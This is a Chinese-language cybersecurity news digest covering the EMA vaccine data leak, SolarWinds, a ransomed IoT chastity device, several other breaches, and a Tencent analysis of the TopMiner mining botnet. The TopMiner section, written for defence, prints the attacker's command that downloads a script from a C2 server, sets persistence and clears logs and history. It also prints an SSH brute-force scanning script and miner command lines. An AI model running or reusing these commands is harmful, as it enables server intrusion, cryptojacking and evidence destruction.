分类: 网络攻击

欧洲药品管理局称黑客泄露了其所窃取的 COVID-19 疫苗数据

欧洲药品管理局(EMA)周二宣布,黑客泄露了去年年底发现的网络入侵行为中被盗的COVID-19疫苗信息。”正在进行的对EMA的网络攻击的调查显示,一些与COVID-19药品和属于第三方的疫苗有关的非法访问文件已经在互联网上泄露,”EMA在一份声明中报道。”执法部门正在采取必要的行动。” 最新情况是在辉瑞-BioNTech以及Moderna都表示,EMA已经通知这些公司,一些评估文件在对该机构的网络攻击中被获取。这次网络攻击发生在这两家公司向EMA提交了各自的COVID-19疫苗并要求批准在欧盟成员国紧急使用之后。 EMA总部设在阿姆斯特丹,是欧盟的一个主管卫生健康的机构,负责监督和评估人类和动物使用各种药品的情况。EMA于12月批准了辉瑞公司和BioNTech公司的疫苗,并在本月早些时候批准了Moderna COVID-19疫苗。 “该机构继续全力支持对数据泄露事件的刑事调查,并通知任何其他实体和个人,他们的文件和个人数据可能已经受到未经授权的访问,”该机构周二写道。 “该机构和欧洲药品监管网络仍在充分运作,与COVID-19药品和疫苗的评估和批准相关的时间表不受影响,”EMA指出。 EMA远不是COVID-19大流行期间第一个被黑客攻击的政府机构。世界卫生组织和美国卫生与人类服务部去年都是网络攻击的受害者,同时美国和世界各地的医院也成为勒索软件攻击的受害者,在某些情况下对服务产生了负面影响。         (消息及封面来源:cnBeta)

SolarWinds 事件持续发酵:黑客以 60 万美元出售 Windows 10 源代码

在对 SolarWinds 事件的深入调查中,微软发现部分内部帐号被黑客获取,并访问了公司的部分源代码。而现在,有一名黑客以 60 万美元的价格出售 Windows 10 源代码,但是无法确定真实性。 来自 Rendition Infosec 的安全研究人员 Jake Williams 报道了这一消息,他警告称这些黑客似乎来自俄罗斯知名黑客组织 Shadow Brokers。但他们可能是为了混淆视听,并非真正有这些源代码访问。 微软证实,黑客能够查看,但不能改变部分产品的源代码,并表示没有证据表明这一活动将微软服务的安全性或任何客户数据置于风险之中。微软表示,查看源代码并不会增加风险,因为该公司并不依赖源代码的保密性来保证产品的安全。         (消息来源:cnBeta;封面来自网络)

黑客攻击联网情趣用品以勒索赎金

一名黑客控制了连接到互联网的智能情趣用品:男性远程贞操笼,并要求用比特币支付赎金来解锁。“你的丁丁已经被我锁定。”根据一名安全研究人员获得的对话截图,黑客对其中一名受害者说。这位研究人员的名字叫Smelly,是收集恶意软件样本的网站vx-underground的创始人。 去年10月,安全研究人员发现,一款物联网情趣用品贞操笼,一种主要在BDSM社区中使用的放置并锁定在阴茎周围并可以联网远程上锁和解锁的性玩具制造商留下了一个API暴露,给了恶意黑客控制设备的机会。根据一位安全研究人员获得的黑客和几位受害者之间的对话截图,非常糟糕的事情就这样发生了。 不过万幸的是,”这件事发生的时候,我并没有锁上这个东西。”Robert在一次在线聊天中说,不然后果真的不堪设想。 受害者Robert表示,他收到了黑客的信息,要求支付0.02比特币(约合今天750美元)来解锁设备。他意识到自己的笼子肯定被 “锁住了”以至于无法使用。 “我现在已经不是笼子的主人了,所以我在任何时候都不能完全控制笼子。”另一位名叫RJ的受害者在一次在线聊天中表示。他收到了黑客发来的信息,黑客说他们已经控制了笼子,并希望支付一笔钱来解锁笼子。 这些黑客再次表明,仅仅因为你可以将某样东西连接到互联网上,并不意味着你必须这样做,尤其是如果你随后不注意保护设备或其连接的安全。 这款设备的中国制造商Qiui没有回应置评请求,这款设备的名字很贴切,叫做Cellmate。 对Cellmate设备进行安全查验的Pentest Partners安全研究员亚历克斯-洛马斯(Alex Lomas)证实,一些用户确实收到了勒索信息,并表示这凸显了这些设备制造商改进安全实践的必要性。           (消息及封面来源:cnBeta)

新西兰央行称遭黑客攻击

据外媒报道,新西兰央行周日表示,该行的一个数据系统已被一名身份不明的黑客入侵,该黑客有可能已经获取商业和个人敏感信息。这家总部位于惠灵顿的银行在一份声明中说,新西兰储备银行用于共享和存储敏感信息的第三方文件共享服务已被非法访问。 行长Adrian Orr表示,漏洞已经得到控制。该银行的核心功能 “仍然健全和运作。”Orr表示:“我们正在与国内和国际网络安全专家和其他相关部门密切合作,作为我们调查和应对这次恶意攻击的一部分。” “潜在被访问的信息的性质和范围仍在确定中,但可能包括一些商业和个人敏感信息,”Orr补充道。 在银行完成初步调查之前,该系统已经被保护并下线。“了解此次数据泄露事件的全部影响需要时间,我们正在与信息可能被访问的系统用户合作,”Orr说。 该银行拒绝回答寻求更多细节的电子邮件问题。目前还不清楚黑客入侵事件发生的时间,也不清楚是否有任何迹象表明谁是责任人,以及文件共享服务是在哪个国家。 在过去的一年里,新西兰的几个主要机构都成为了网络干扰的目标,其中包括新西兰证券交易所,该交易所的服务器在8月份遭网络黑客攻击,连续崩溃近一周时间。 奥克兰大学计算机科学教授Dave Parry告诉新西兰电台,银行数据泄露事件背后的“罪魁祸首”很可能是另一个政府。“最终如果你是从一种类似于犯罪的角度来的,政府机构是不会支付你的赎金或其他什么的,所以你更感兴趣的可能是从政府对政府的层面来的,”Parry说。           (消息来源:cnBeta;封面来自网络)

Solarwinds 受害者规模扩大 美国司法部承认电子邮件系统被入侵

Solarwinds 大规模黑客攻击要比预想的要糟糕,近日美国司法部承认由 Microsoft 365 提供的电子邮件服务被入侵。在一份声明中,美国司法部承认有 3% 的邮箱被黑客入侵。不过本周三,司法部发言人 Marc Raimondi 表示:“目前我们没有迹象表明任何机密系统受到影响”。 根据目前的统计数据,已经有超过 1.8 万家企业因 Solarwinds 而被黑客入侵,美国联邦调查局和美国国家安全局都将此次攻击归咎于高级持续性威胁(APT)行为者,很可能是俄罗斯。司法部已根据《联邦信息安全现代化法案》宣布此次黑客攻击为重大事件,并表示将根据联邦机构,国会和公众的需要继续公开相关内容。         (消息来源:cnBeta;封面来自网络)

黑客利用特朗普丑闻假视频传播恶意软件

Cybesecurity研究人员今天观察到一个恶意垃圾邮件活动,该活动通过发布美国总统唐纳德·特朗普(Donald Trump)的丑闻假视频来传播远程访问木马(RAT)。 电子邮件的主题为“ GOOD LOAN OFFER !!”,附带一个名为“ TRUMP_SEX_SCANDAL_VIDEO.jar”的Java存档(JAR)文件,一旦被下载,该文件会将Qua或Quaverse RAT(QRAT)安装到系统中。 Trustwave高级安全研究员戴安娜·洛帕(Diana Lopera)在文章中说:“我们怀疑,黑客正试图利用最近结束的总统大选的噱头进行网络犯罪活动。” 最新的恶意活动是八月份发现的基于Windows的QRAT下载器的变体。 感染链从包含嵌入式附件或指向恶意zip文件的链接的垃圾邮件开始,它们均会检索使用Allatori Java混淆器加扰的JAR文件(“ Spec#0034.jar”)。 第一阶段下载程序将Node.Js平台设置到系统上,下载并执行称为“ wizard.js”的第二阶段下载程序,该程序负责持久获取并运行Qnode RAT(“ qnode-win32-ia32。 js”)。 QRAT是典型的远程访问木马,具有获取系统信息、执行文件操作以及从Google Chrome、Firefox、Thunderbird和Microsoft Outlook等应用程序获取凭据的功能。 这次恶意活动的变化是包含了一个新的弹出警报,该警报会通知受害者正在运行的JAR是用于渗透测试的远程访问软件。这也意味着,一旦用户单击“确定”按钮,该样本的恶意行为就会开始显现。 此外,JAR下载程序的恶意代码被分为不同的随机编号的缓冲区以逃避检测。 其他变化包括JAR文件大小的增加以及为更新的恶意软件链而取消了第二阶段的下载程序,更新的恶意软件链可立即获取QRAT有效负载(现称为“ boot.js”)。 就其本身而言,RAT除了通过VBS脚本负责保持在目标系统上的持久性外,还使用了base64编码对代码进行了加密。 Topera总结说:“自我们首次检查以来,该恶意软件的威胁已大大增强。”他敦促管理员在电子邮件安全网关中阻止传入的JAR。         消息及封面来源:The Hacker News,译者:江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c

黑客窃取 250 万个人数据 意大利运营商提醒用户尽快更换 SIM 卡

12 月 28 日,沃达丰(Vodafone)旗下意大利运营商 Ho Mobile 被曝发生了用户数据泄露事件。当时一名安全分析师指出,其在某个暗网论坛上发现了有人在兜售电信公司的数据库。虽然一开始打算冷处理,但本周一的时候,Ho Mobile 最终还是证实了本次大规模个人数据泄露。据说受影响的用户数量大约为 250 万,目前 Ho Mobile 正督促用户尽快更换 SIM 卡。 本周一,Ho Mobile 在官网上发布了一则公告,同时以短信形式向所有受影响客户发送了消息。 早些时候,@Bank_Security 猜测黑客攻破了这家运营商的服务器,并且盗走了详尽的用户数据,包括全名、手机号码、社保号码、电子邮件地址、出生日期、国籍、以及家庭住址。 虽然 Ho Mobile 表示本次入侵不涉及任何财务数据或通话详情,但还是承认黑客已掌握用户 SIM 卡相关的详情。 为避免欺诈或 SIM 卡伪造攻击,Ho Mobile 敦促所有受影响的客户(如有必要)及时更换 SIM 卡,且运营商承诺不收取任何费用。 Ho Mobile 写道:“你可携带有效身份证件,前往任何一处授权门店,并要求免费更换 SIM 卡”。后续该运营商还将与当地执法机构一道,对本次黑客攻击事件的幕后展开进一步的调查。       (消息及封面来源:cnBeta)

腾讯主机安全截获 TOPMiner 挖矿木马,受害服务器约 1.5 万台,作者称“ 12 小时扫描全球”

一、概述 腾讯主机安全(云镜)检测到挖矿木马TopMiner近期攻击十分活跃,该木马通过SSH弱口令爆破进行攻击入侵,会清除竞品挖矿木马,同时会使用爆破工具在内网横向传播。根据其挖矿钱包收益估算,约有1.5万台服务器被该团伙控制挖矿。由于其使用的挖矿木马名为top,腾讯安全将其命名为TopMiner挖矿木马。 TopMiner挖矿团伙针对SSH弱口令进行爆破攻击,成功后执行命令下载恶意shell脚本,并将启动脚本写入crontab定时任务进行持久化,shell脚本继续下载挖矿木马nginx、top启动挖矿。 木马入侵系统后,还会下载SSH爆破程序sshd,扫描到网络中开放22端口的Linux系统机器后,通过实时更新的密码字典对其root账号进行爆破攻击。攻击者在爆破攻击程序代码留下注释:”宽带充足基本可以12个小时扫描全球”,气焰可谓十分嚣张。 分析过程中,我们还在黑客控制的服务器上发现了具有执行远程命令功能的backdoor木马、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对目标系统进行完全控制。 腾讯云主机安全(云镜)支持对云主机是否存在SSH空口令、弱口令进行检测并向客户告警,通过分析获得流行病毒木马内置的弱密码字典来检测云主机弱密码风险,具有很强的实战性。腾讯安全专家建议企业安全运维人员尽快解决服务器配置弱口令的风险。 自查处置建议 腾讯安全专家建议企业安全运维人员对服务器进行检查,清理以下相关项: 文件和进程: /tmp/.top-unix/nginx /tmp/.ICE-unix1/top /srv/.ICE-unix1/sshd /srv/.ICE-unix1/scan.sh /etc/ipv6_addrconf /etc/crypto Crontab定时任务: /tmp/.top-unix/top            -o              stratum+tcp://pool.supportxmr.com:8080               -u 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN -p X /tmp/.top-unix/nginx           -o           stratum+tcp://mine.c3pool.com:15555                 -u 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL -p X /etc/crypto 腾讯安全响应清单 腾讯安全系列产品可针对TopMiner挖矿木马攻击传播的各个环节进行阻断拦截: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)TopMiner挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)TopMiner挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)TopMiner木马关联的IOCs已支持识别检测; 2)检测SSH弱口令爆破攻击。 有关云防火墙的更多信息,可参考:  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀TopMiner木马程序; 2)主动检测系统是否存在SSH弱口令并提示; 3)检测SSH弱口令爆破攻击。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测TopMiner木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta   二、详细分析 2.1、攻击入侵方式 病毒通过SSH弱口令爆破入侵系统,随后执行恶意命令下载脚本crypto,并将其写入crontab定时任务。 bash -c cd /etc wget -P /etc http://103.45.183.12:808/crypto chmod 0777 crypto nohup /etc/crypto > /dev/null 2>&1 & chattr +i /etc/crypto echo "/etc/crypto">>/etc/rc.local echo "/etc/crypto">>/etc/crontab echo > /var/log/wtmp history -c crypto会检查自己的挖矿进程/tmp/.ICE-unix1/top是否存在,如果不存在会判断是否有竞品挖矿木马存在,然后会杀掉竞品挖矿木马进程kswapd0、rsync、tsm、work32、work64、go、joseph,然后从C2服务器下载挖矿木马top并启动挖矿。 Top挖矿木马下载地址为:http[:]//xiazai.qq360bidu.me:808/top 挖矿使用矿池:91.121.140.167:443 挖矿使用钱包: 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL 根据其矿池算力平均340KH/s,可推算该挖矿团伙已控制约1.5万台服务器进行挖矿,平均每天获利约154美元(0.17个门罗币),折合人民币约1000元。 2.2、横向移动 木马入侵系统后会接着下载端口爆破程序sshd以及待攻击的IP列表ips.txt、用户名字典user.txt、密码字典password.txt到/srv/.ICE-unix1/目录下。 观察文件被创建的时间,除了爆破程序sshd和用户名列表user.txt是6月份被修改过(可能是初次创建),其他文件操作时间均为12月,并且密码字典文件password.txt的修改时间就在近期。可见其感染系统后,攻击模块一直处于活跃状态,并且攻击对象、密码字典在持续更新扩充。 其中一个待爆破IP列表里有超过19万个IP地址: 爆破用户名:root,其中一个密码字典有1700余个密码,部分如下: 攻击时脚本scan.sh负责启动扫描进程masscan和爆破进程sshd,脚本代码如下: #!/bin/bash yum install masscan -y apt-get install masscan -y if [ $# -ne 4 ]; then echo "脚本默认安装扫描工具为masscan" echo "运行参数应为 ./scan.sh IP范围 端口 扫描线程 爆破线程" echo "IP范围支持1.0.0.0-1.255.255.255或 1.0.0.0/8这种" echo "扫描线程取1-100万左右,G口肯定是30-100万跑,线程越低结果越准,宽带充足基本可以1 2个小时扫描全球" exit fi echo '' > a.txt masscan $1 -p $2 --rate $3 --excludefile pingbi.txt -oL a.txt echo '' > ip.txt cat a.txt | grep -B0 open | grep -oP '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -u > ip.txt./sshd ip.txt user.txt password.txt $2 $4   在实际攻击过程中,针对22端口进行爆破,爆破线程被设置为1000。 ./sshd ips.txt user.txt password.txt 22 1000   2.3、该团伙使用的其他木马 除了shell脚本、挖矿木马、爆破程序之外,我们在黑客控制的服务器上还发现了具有DDoS和远程shell功能的Kaiji木马,以及backdoor木马cnet2。 挖矿木马“ipv6_addrconf”、“systemd”、“top”为挖矿程序XMRig编译,其中“ipv6_addrconf”、“systemd”通过加UPX壳保护。 backdoor木马“cnet2”,具有监听端口,连接服务端,下载文件,执行远程命令等功能。 Kaiji木马“3”、“amd64”、“php-fpm”采用Go语言编写,具有DDoS攻击、远程shell以及SSH爆破攻击等功能,详情可参考腾讯安全此前的分析报告 https://s.tencent.com/research/report/1168.html。             IOCs IP 103.45.183.12(ZoomEye搜索结果) Domain xiazai.qq360bidu.me URL http[:]//xiazai.qq360bidu.me:808/top http[:]//103.45.183.12:808/crypto MD5 amd64 c491074d7723e6a6b1b1b8fb002f09b6 cnet2 9d2681b69116f866477dbe3bda0cbf49 top f74d1803befb993040aab866dbe6f12f systemd 640c6f1e7a5efdba49aeaa06d0dac304 crypto 9f0993ac09182d9ec08d1c562d2cfcbd sleep fbf0dccc0d9e674858d63e521eb122a0 sshd 15a653e96bada2fc2e47db59d863f4ff ipv6_addrconf b641d939b7cf70606ff5826f68c47d29 钱包: 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL

遭俄罗斯黑客攻击后 美国政府提高警惕

据《纽约时报》报道,美国网络司令部司令兼美国国安局局长保罗·中曾根在选举日曾报告说,反对俄罗斯干预总统竞选的战斗已经取得了重大成功,并暴露了对方的在线武器、工具和谍报技术。他对记者说:“我们拓宽了行动范围,感觉我们现在的情况非常好。”八周后, 中曾根将军和其他负责网络安全的美国官员现在被他们至少9个月来所忽略的事情所消耗:现在被认为影响到多达250个联邦机构和企业的黑客攻击,俄罗斯的目标不是选举系统,而是美国政府的其他部门和许多美国大公司。 入侵事件曝光三周后,美国官员仍在试图了解俄罗斯人的所作所为,究竟是简单的在美国官僚系统内部进行间谍活动,还是将“后门”接入政府机构、大公司、电网以及开发和运输新一代核武器的实验室。 《纽约时报》认为,至少这些事件已经引发了美国政府和私营部门网络易受攻击的警报,并提出了美国国家网络防御系统为何失败的问题。 鉴于此次漏洞并不是由任何一个分担网络防御责任的政府机构–军方的网络司令部和国家安全局(均由中曾根将军掌管)以及国土安全部–发现的,而是由一家私营网络安全公司FireEye发现的,因此这些问题显得尤为紧迫。 “这看起来比我最初担心的要糟糕得多,”弗吉尼亚州民主党参议员、参议院情报委员会排名成员马克·华纳说。“它的规模不断扩大。很明显,美国政府错过了它。”“而如果FireEye没有站出来,”他补充说,“我不确定我们到今天还能不能完全意识到这一点。” 对调查情报机构认为是俄罗斯S.V.R.情报部门行动的关键人物的采访显示了这些要点: 漏洞的范围比最初认为的要大得多。最初的估计是,俄罗斯只向18000个政府和私人网络中的几十个网络发起攻击,他们在德克萨斯州一家名为SolarWinds的公司制造的网络管理软件中插入代码,从而获得了访问权。但随着亚马逊和微软等提供云服务的企业深入挖掘证据,现在看来,俄罗斯利用供应链的多个层面获得了多达250个网络的访问权限。 黑客从美国境内的服务器进行管理入侵,利用国家安全局从事国内监控的法律禁令,躲过了国土安全部部署的网络防御措施。 美国网络司令部和国家安全局在外国网络深处放置的“预警 ”传感器,用于侦测酝酿的攻击,显然是失败的。目前也还没有迹象表明,有任何人类情报机构向美国发出了黑客攻击的警报。 美国政府对选举防御的重视虽然在2020年至关重要,但可能转移了资源和注意力,使其无法解决保护软件“供应链”等酝酿已久的问题。在私营部门,也是如此,像FireEye和微软这样专注于选举安全的公司,现在也透露他们被攻破,成为更大的供应链攻击的一部分。 据现任和前任员工以及政府调查人员称,被黑客用作攻击渠道的SolarWinds公司,其产品的安全性能历来不高,因此很容易成为目标。该公司首席执行官 Kevin B. Thompson已经回避了他的公司是否应该发现入侵的问题。 部分被入侵的SolarWinds软件是在东欧设计的,美国调查人员目前正在研究入侵是否源自那里,因为俄罗斯情报人员在那里根深蒂固。 攻击背后的意图仍被掩盖。但随着新政府在不到三周后上任,一些分析人士表示,俄罗斯人可能试图动摇华盛顿对其通信安全的信心,并展示他们的cyberarsenal,以便在核武谈判之前获得对当选总统拜登的影响力。 “我们仍然不知道俄罗斯的战略目标是什么,”曾在奥巴马政府期间担任国土安全部高级网络官员的Suzanne Spaulding说。“但我们应该关注的是,这其中的一部分可能超出了侦察的范围。他们的目标可能是让自己处于对新政府有影响力的地位,就像拿枪指着我们的脑袋,以阻止我们采取行动对抗普京。” 日益增长的打击名单 美国政府显然是攻击的主要焦点,财政部、国务院、商务部、能源部和五角大楼的部分机构都被证实被渗透。国防部坚持认为对其系统的攻击是不成功的,尽管它没有提供证据。 但黑客攻击也攻破了大量的公司,其中许多公司尚未出面。SolarWinds被认为是俄罗斯在黑客攻击中使用的几家供应链供应商之一。微软截至12月17日已统计出40名受害者,起初它说自己没有被入侵,但本周才发现自己被入侵了–而且其软件的经销商也被入侵了。亚马逊情报团队此前未报告的评估发现,受害者人数可能是其五倍之多,不过官员警告说,其中一些人可能被重复计算。 官员们在公开场合表示,他们不相信来自俄罗斯S.V.R.的黑客攻破了包含敏感通信和计划的机密系统。但私下里,官员们表示,他们仍不清楚可能被窃取的内容。 他们说,他们担心黑客可能从联邦能源监管委员会等受害者那里窃取了微妙但不保密的数据,包括 “黑启动(Black-Start) “,即美国计划在大停电时如何恢复电力的详细技术蓝图。 这些计划将给俄罗斯提供一个目标系统的命中名单,以防止其在2015年在乌克兰发动的攻击中恢复电力,在深冬时关闭电力6小时。莫斯科早就在美国电网中植入了恶意软件,美国也对俄罗斯做了同样的事情,以示威慑。 供应链受损 到目前为止,调查的一个主要焦点是SolarWinds,这家位于奥斯汀的公司,其软件更新被黑客入侵。但美国国土安全部的网络安全部门认为,黑客也是通过其他渠道工作的。而上周,另一家安全公司CrowdStrike透露,它也被同样的黑客盯上了,但没有成功,但通过一家转售微软软件的公司。 由于经销商经常受托设置客户的软件,他们–像SolarWinds一样–可以广泛进入微软客户的网络。因此,他们可以成为俄罗斯黑客的理想木马。情报官员对微软没有更早发现这次攻击表示愤怒;该公司周四表示,黑客查看了其源代码,但没有透露其哪些产品受到影响,也没有透露黑客在其网络内部停留了多长时间。 Obsidian Security公司创始人Glenn Chisholm表示:“他们瞄准了供应链中最薄弱的环节,并通过我们最信任的关系进行攻击。” 对SolarWinds现员工和前员工的采访表明,它迟迟没有将安全作为优先事项,即使其软件被美国首屈一指的网络安全公司和联邦机构采用。员工们表示,在受过培训的会计师和前首席财务官汤普森先生的领导下,公司对业务的每一个部分都进行了检查,以节约成本,而普通的安全实践则因其费用而被摒弃。他的方法帮助SolarWinds的年利润率从2010年的1.52亿美元增加了近三倍,到2019年超过4.53亿美元。 但其中一些措施可能会使公司及其客户面临更大的攻击风险。SolarWinds将其大部分工程转移到捷克共和国、波兰和白俄罗斯的办公室,在那里,工程师可以广泛访问俄罗斯特工入侵的Orion网络管理软件。该公司仅表示,对其软件的操纵是人为黑客所为,而非计算机程序。该公司没有公开处理内部人员参与入侵的可能性。 《纽约时报》最近几周接触的SolarWinds客户中,没有一个人知道他们依赖的是在东欧维护的软件。许多人表示,他们甚至直到最近才知道自己使用的是SolarWinds软件。 即使在整个联邦网络中安装了它的软件,员工们说,SolarWinds只是在2017年,在新的欧洲隐私法的惩罚威胁下,才加装了安全防护措施。员工说,直到那时,SolarWinds才聘请了第一位首席信息官,并安装了一位 “安全架构 “副总裁。 SolarWinds的前网络安全顾问Ian Thornton-Trump表示,他当年曾警告管理层,除非它对内部安全采取更积极的态度,否则网络安全事件将是 “灾难性的”。在他的基本建议被忽视后,桑顿-特朗普先生离开了公司。 SolarWinds拒绝回应有关其安全性是否充分的问题。在一份声明中,它说它是 “高度复杂、复杂和有针对性的网络攻击的受害者”,并正在与执法部门、情报机构和安全专家密切合作进行调查。 但安全专家指出,在发现俄罗斯攻击后数天,SolarWinds的网站才停止向客户提供受影响的代码。 攻大于守 近年来,数十亿美元的网络安全预算流向了进攻性的间谍活动和先发制人计划,也就是中曾根将军所说的 “超前防御 “的需要,通过入侵对手的网络,尽早了解他们的行动,并在必要时,在他们发动攻击之前,在自己的网络内部进行反击。但这种方法虽然被誉为早就应该采取的先发制人的策略,但却错过了俄罗斯的漏洞。 据FireEye报道,俄罗斯人通过从美国境内的服务器发动攻击,在某些情况下,他们使用的计算机与受害者在同一个城镇或城市,利用了国家安全局的权力限制。国会没有赋予该机构或国土安全局任何进入或保卫私营部门网络的权力。正是在这些网络上,S.V.R.特工们不太小心,留下了他们入侵的线索,FireEye最终得以发现。 通过将自己插入到SolarWinds的猎户座更新中,并使用自定义工具,他们还避免了跳过国土安全局在政府机构中部署的 “爱因斯坦 “检测系统的警报,以捕捉已知的恶意软件,以及所谓的C.D.M.程序,该程序是明确设计用来提醒机构注意可疑活动的。 一些情报官员质疑,政府是否如此专注于选举干预,以至于在其他地方制造了空子。情报机构几个月前得出结论,认为俄罗斯已经确定无法渗透到足够多的选举系统来影响选举结果,而是将注意力转移到转移可能剥夺选民权利的勒索软件攻击,以及旨在播撒不和谐的影响行动,引发对系统完整性的怀疑,改变选民的想法。 早在2019年10月就开始的SolarWinds黑客攻击事件,以及对微软经销商的入侵,让俄罗斯有机会攻击多个联邦机构中最脆弱、最不设防的网络。 中曾根将军拒绝接受采访。但国家安全局发言人查尔斯-K-斯塔德兰德说。“我们不认为这是一个’非此即彼’的权衡。选举安全工作中构建的行动、见解和新框架,对国家和美国政府的网络安全态势有着广泛的积极影响。” 事实上,美国似乎已经成功说服了俄罗斯,即旨在改变选票的攻击将促使俄罗斯采取代价高昂的报复行动。但随着入侵规模的凸显,美国政府显然未能说服俄罗斯,执行对联邦政府和企业网络的大范围黑客攻击会有相当的后果。 把黑客“赶出去” 情报官员说,他们可能要花几个月甚至几年的时间才能对黑客攻击事件有一个全面的了解。 自2017年提取一名克里姆林宫高层线人以来,中情局对俄罗斯行动的了解已经减少。而情报官员说,S.V.R.通过避免可能向国家安全局暴露机密的电子通讯,一直保持着世界上最有能力的情报部门之一。 对S.V.R.最好的评估来自荷兰人。2014年,为荷兰情报和安全总局工作的黑客刺破了该组织使用的电脑,至少观察了一年,并一度将其拍下。 正是荷兰人在2014年和2015年帮助提醒白宫和国务院他们的系统遭到S.V.R.黑客攻击,上个月,他们抓住了两名被指控渗透到荷兰科技公司的S.V.R.特工,并将其驱逐出荷兰。虽然该组织并不以破坏性著称,但其渗透到的计算机系统中却很难驱逐。 当S.V.R.闯入国务院和白宫的非机密系统时,时任国家安全局副局长的理查德-莱杰特说,该机构进行的数字相当于“徒手搏斗”。有一次,S.V.R.获得了调查人员用来连根拔除俄罗斯后门的NetWitness Investigator工具的访问权限,以这样的方式操纵它,使黑客继续逃避检测。 调查人员说,他们会认为自己已经把S.V.R.“赶出去”了,却发现这群人从另一扇门“爬了进来”。 一些安全专家说,把这么多庞大的联邦机构赶出S.V.R.可能是徒劳的,唯一的出路可能是关闭系统,重新开始。其他人说,在大流行期间这样做将是非常昂贵和耗时的,新政府将不得不努力识别和控制每一个受损的系统,然后才能校准响应。 “S.V.R.是故意的,他们很复杂,而且他们没有像我们在西方国家那样的法律约束,”前政府情报分析师亚当-达拉说,他现在是安全公司Vigilante的情报总监。他补充说,制裁、起诉和其他措施都没能阻挡住S.V.R.,它已经显示出它可以迅速适应。 “他们现在正在非常密切地观察我们,”达拉说。“而且他们会相应地进行调整。”         (消息来源:cnBeta,封面来自网络)

SolarWinds 被黑事件比预期更严重 超 250 家机构受影响

援引《纽约时报》报道,SolarWinds 被黑事件对美国政府机构、私营企业造成的危害可能比预期的更加严重。根据目前掌握的最新信息,大约有超过 250 家美国联邦机构和企业受到影响。 微软表示,黑客入侵了 SolarWinds 的 Orion 监控和管理软件,从而让他们能够冒充该组织现有的任意用户和帐号,包括拥有高级别权限的账户。纽约时报报道称,疑似有俄罗斯政府背景的黑客组织利用供应链的层级来访问这些机构的系统。 纽约时报在报道中指出,美国网络司令部和国家安全局在外国网络内部放置的用于检测潜在攻击的预警传感器似乎在这次事件中失效了。此外,报道中还指出在今年总统大选期间,政府还利用了 SolarWinds 的资源和技术来进行检测,从而让黑客躲过了美国国土安全部门的检测。 本周早些时候,微软发现多个系统被渗透,其中不仅仅只是 SolarWinds 恶意代码。黑客能够 “查看一些源代码库中的源代码”,但授予访问权限的黑客账户并没有修改任何代码或系统的权限。 不过一个好消息是,微软发现“没有证据表明生产服务或客户数据被访问”,“没有迹象表明我们的系统被用来攻击他人”。         (消息及封面来源:cnBeta)